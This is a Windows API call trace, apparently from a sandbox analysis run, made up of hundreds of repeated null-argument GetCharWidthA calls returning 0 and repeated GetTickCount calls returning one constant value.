[0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.417] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.418] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.419] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.420] GetCharWidthA (in: hdc=0x0, iFirst=0x0, iLast=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.477] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.478] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.479] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.480] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.481] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.482] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.483] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 